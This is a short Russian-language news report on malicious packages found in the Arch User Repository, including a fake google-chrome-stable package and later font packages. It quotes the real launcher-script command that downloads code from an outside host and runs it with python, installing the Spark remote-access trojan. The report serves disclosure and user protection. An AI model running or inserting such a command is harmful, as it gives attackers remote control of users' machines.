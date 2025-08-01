В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда 'python -c "$(curl https://segs.lol/9wUb1Z)"', загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет google-chrome-stable был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления google-chrome-stable в AUR были загружены два вредоносных пакета - "chrome" и "chrome-bin", содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.



